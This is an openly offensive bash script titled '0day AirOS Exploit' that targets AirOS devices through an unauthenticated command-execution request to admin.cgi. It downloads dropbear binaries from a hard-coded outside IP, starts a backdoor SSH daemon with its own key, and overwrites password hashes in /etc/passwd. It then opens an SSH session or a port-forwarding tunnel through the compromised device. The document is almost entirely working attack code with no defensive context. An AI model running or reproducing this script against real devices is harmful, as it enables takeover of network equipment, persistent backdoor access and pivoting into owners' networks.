0day AirOS Exploit http://www.blackploit.com/2011/12/0day-en

1. #!/bin/bash
2.  
3. host=$1
4. portlocal=$2
5. hostfinal=$3
6. portfinal=$4
7. unset c
8. usage() {
9.         # ./airosh IP
10.         exit 1
11. }
12. [[ -z "$host" ]] && c=1
13. [[ -z "$portlocal" ]] && c=2
14. [[ -z "$hostfinal" ]] && c=2
15. [[ -z "$portfinal" ]] && c=2
16.  
17. if [[ $c = 1 ]]; then
18.         echo "FAILED!"
19.         usage
20. else
21.         echo "OK"
22. fi
23. runcmd() { curl -L -H 'Expect: ' -F 'action=cli' -F "exec={ $SYS2$@; } 2>&1" $host/admin.cgi/lol.css 2>/dev/null | grep 'Execute!'  -A 99999 | tail -n +5 | tac | tail -n +7 | tac; }
24.  
25. runcmd 'cd /var/persistent;wget -q http://5.175.223.63/dropbearkey;wget -q http://5.175.223.63/dropbear;chmod +x dropbearkey dropbear;'  >>/tmp/airos.log
26.  
27. runcmd "[[ -e /var/sshd/lol.rsa ]] || ./dropbearkey -t rsa -f /var/sshd/lol.rsa" >>/tmp/airos.log
28.  
29. runcmd "./dropbear -b /var/sshd/motd -r /var/sshd/lol.rsa;" >>/tmp/airos.log
30.  
31. runcmd 'sed -i -e "s/:[^:]*:/:$1$.et5JTtj$6U9j6CSf7g3lNfhFenOX11:/" /etc/passwd;cat /etc/passwd'
32.  
33. echo -en "| >>user: "
34. read usr
35. [[ -z "$usr" ]] && usr=admin
36.  
37. if [[ "$c" = 2 ]]; then
38.         ssh -C "$usr@$host"
39. else
40.         ssh -g -L "0.0.0.0:$portlocal:$hostfinal:$portfinal" "$usr@$host"
41. fi